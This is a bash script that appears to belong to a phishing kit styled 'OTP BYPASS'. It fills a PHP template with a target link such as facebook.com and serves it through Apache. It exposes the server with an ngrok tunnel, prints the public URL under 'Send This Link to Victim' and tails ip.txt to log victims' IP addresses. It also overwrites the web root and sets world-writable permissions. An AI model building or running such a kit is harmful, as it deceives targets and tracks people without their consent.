#!/bin/bash
stop() {
checkngrok=$(ps aux | grep -o "ngrok" | head -n1)
if [[ $checkngrok == *'ngrok'* ]]; then
pkill -f -2 ngrok > /dev/null 2>&1
killall -2 ngrok > /dev/null 2>&1
fi
if [[ -e sendlink ]]; then
rm -rf sendlink
fi
}
sleep 2
spinlong ()
{
bar=" +++++++++++++++++++++++++++++++++++++++++++++++++++++++++"
barlenght=${#bar}
i=o
while ((i < 100 )); do
n=$((i*barlenght / 100 ))
printf "\e[00;32m\r[%-${barlenght}s]\e[00m" "${bar:0:n}"
((i += RANDOM%5+2))
sleep 0.4
done
}
white='\e[1;37m'
green='\e[0;32m'
blue='\e[1;34m'
red='\e[1;31m'
yellow='\e[1;33m'
echo ""
echo ""
echo ""
clear
echo -e $green " ┬┌─┐┌─┐┬┌┐┌┌┬┐┌─┐┬─┐ "
echo -e $green " │├─┘├┤ ││││ ││├┤ ├┬┘ "
echo -e $green " ┴┴ └ ┴┘└┘─┴┘└─┘┴└─ "
echo -e $white " +++++++++ OTP BYPASS +++++++ "
echo""
echo""
echo""
read -p $'\e[1;92m[\e[0m\e[1;77m*\e[0m\e[1;92m] Enter The Link (Ex : www.facebook.com) \e[0m' pass_text
sed -e "s/\$1/$pass_text/" post.php > index.php
sudo apt-get install apache2
apt install php
systemctl start apache2
systemctl restart apache2.service
clear
mv /var/www/html/* /var/www/
rm -rf /var/www/html/*
cp -R * /var/www/html/
cd ..
cd /var/www/html/
clear
chmod +x *
chmod 7777 *
echo""
echo""
echo""
./ngrok http 80 > /dev/null &
sleep 25
./Logo.sh
echo ""
echo -e $yellow "// [ Send This Link to Victim ] //"
echo ""
echo -e $white
curl -s localhost:4040/api/tunnels | jq -r .tunnels[1].public_url
curl -s localhost:4040/api/tunnels | jq -r .tunnels[0].public_url
echo ""
echo ""
echo -e $green "// [ TRACKING ] //"
echo -e $white
echo ""
tail -f ip.txt
;;